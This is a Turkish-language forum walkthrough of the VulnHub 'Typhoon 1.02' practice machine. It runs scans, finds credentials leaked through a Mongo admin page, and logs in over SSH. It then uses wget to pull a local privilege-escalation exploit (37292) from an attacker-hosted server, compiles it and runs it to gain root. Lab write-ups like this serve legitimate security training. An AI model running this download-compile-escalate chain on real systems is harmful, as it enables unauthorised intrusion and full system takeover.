Typhoon: 1.02 Zafiyetli Makine Çözümü

Qwx

Kıdemli Üye
30 Nis 2012
2,728
13
Typhoon: 1.02 Zafiyetli Makine Çözümü

Typhoon: 1.02 indirme linki;

Kod:
[COLOR=Silver][B]https://www.vulnhub.com/entry/typhoon-102,267/[/B][/COLOR]
Makinemizin ilk açılış görüntüsü.


ilk.jpg



İlk olarak makinemizin IP adresini öğreniyoruz.

Kod:
[COLOR=Silver]netdiscover[/COLOR]

netdiscover.jpg


Ardından nmap taraması ile açık portlara bakıyoruz.

Kod:
[COLOR=silver]nmap -sS -sV <adress>[/COLOR]

nmap.jpg


Sitemize bir bakıyoruz.Bizi bu şekilde bir site karşılıyor.

site.jpg


Ardından dirb taraması yapıp site içerisindeki dosyalara bakıyoruz.

Kod:
[COLOR=silver]dirb http://<adress>[/COLOR]

dirb.jpg


Sitemizde robots.txt adlı bir uzantı var çoğunlukla burada çözümde ilerlemeye dayalı bilgiler barındırılıyor hemen robots.txt'yi açıyoruz.

robots.jpg


robots.txt'yi açtığımızda bize başka bir uzantıya gitmemiz gerektiğini söylüyor.

monogoadmin.jpg


[stats] a bastığımız zaman aşağıya bir takım giriş bilgilerinin geldiğini görmekteyiz.

bilgiler.jpg


Bu giriş bilgileri doğrultusunda giriş yapmayı deniyoruz.

Kod:
[COLOR=silver]ssh typhoon@<adress>[/COLOR]
Kod:
[COLOR=YellowGreen][B][COLOR=YellowGreen][B][COLOR=YellowGreen][B][COLOR=silver]789456123[/COLOR][/B][/COLOR][/B][/COLOR][/B][/COLOR]
icerdeyiz.jpg


Şimdi kendimizi root'a yükseltmemiz gerekiyor.Bunun için ilk olarak ubuntunun exploitlerine bakıyoruz.Ardından 7575 portu üzerinden python kodu ile giriş sağlayacağız.7575 portumuzu dinlemeye alıyoruz.


Kod:
[COLOR=silver]searchsploit ubuntu 14.04[/COLOR]
Kod:
[COLOR=silver][B][B][B]searchsploit -m 37292[/B][/B][/B][/COLOR]
[COLOR=silver][B][B][B]python -m SimpleHTTPServer 7575[/B][/B][/B][/COLOR]
exploit.jpg


Şimdi dinlemeye aldığımız 7575 portumuza makinemizden 37292.c dosyasını indirmesini sağlıyoruz.Ardından 37292.c dosyasını derlemesini sağlıyoruz.Derledikten sonra da dosyamızı açıyoruz.


Kod:
[COLOR=silver]cd /tmp[/COLOR]
Kod:
[COLOR=silver][B][B][B]wget http://<uradress>:7575/37292.c[/B][/B][/B][/COLOR]
[COLOR=silver][B][B][B]gcc 37292.c -o exploit[/B][/B][/B][/COLOR]
[COLOR=silver][B][B][B]./exploit[/B][/B][/B][/COLOR]
wgetroot.jpg


Açıktan yararlanarak sistemde root kullanıcısı olduk şimdi tek yapmamız gereken flag.txt'yi aramak olacak.

Kod:
[COLOR=silver]cd /root[/COLOR]
Kod:
[COLOR=YellowGreen][B][COLOR=YellowGreen][B][COLOR=YellowGreen][B][COLOR=silver]cat root-flag[/COLOR][/B][/COLOR][/B][/COLOR][/B][/COLOR]
flag.jpg








 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.